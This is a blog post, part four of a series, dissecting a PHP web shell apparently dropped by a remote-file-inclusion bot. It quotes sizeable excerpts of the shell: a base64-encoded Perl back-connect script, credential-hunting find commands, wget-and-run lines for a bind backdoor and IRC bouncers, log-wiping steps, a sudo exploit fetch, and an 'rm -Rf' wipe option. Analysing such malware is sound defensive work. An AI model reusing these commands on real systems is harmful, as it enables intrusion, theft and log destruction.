Irregular Expressions

Aug 21 2010   12:26AM GMT

Casper RFI crack bot – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor


This one also looks juicy!

Another php,

$sh_id = “Q2FTcEVyX0thRUB5YWhPTy5jT20=”;
$sh_ver = “0.0 01.01.2010”;
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = “”;
$html_start = ”.
<title>’.getenv(“HTTP_HOST”).’ – ‘.$sh_name.'</title>
<style type=”text/css”>

What are you up to with this one?

We have lots of toys to play with.

$login = "";
$pass = "";
$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
$host_allow = array("*"); //Contoh: array("192.168.0.*","")
$login_txt = "Restricted Area"; //Pesan HTTP-Auth
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //Jika TRUE, update shell sekarang.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = ""; //email untuk pengiriman log.
$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
$sess_cookie = "c99shvars"; //Nama variabel Cookie
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);

A few functions on checking and reporting disk usage..

Now this is worth tracking down.

//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV)) {
  $millink=" Kernel ".$Lversion;
} else {
  $millink ="".$OSV." ".$Lversion;
//End of milw0rm search

I wish milw0rm was still around so we could see what those are for 🙁

Here is a few things that are encrypted.

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7

And a few others, no point in sharing 🙂

We are sure reporting back for a lot of things.

  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find files", "find / -type f -name"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")

OK now this is nice!

  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("wget WIPELOGS PT1","wget"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("wget RatHole 1.2 (Linux & BSD)","wget"),
    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget"),

Looking for a few more things. We pull down some log wipers, from packetstorm, and grab RatHole 1.2 from the same place, and a local sudo exploit.

This is a big one, I will have to continue this tomorrow.

 Comment on this Post

There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: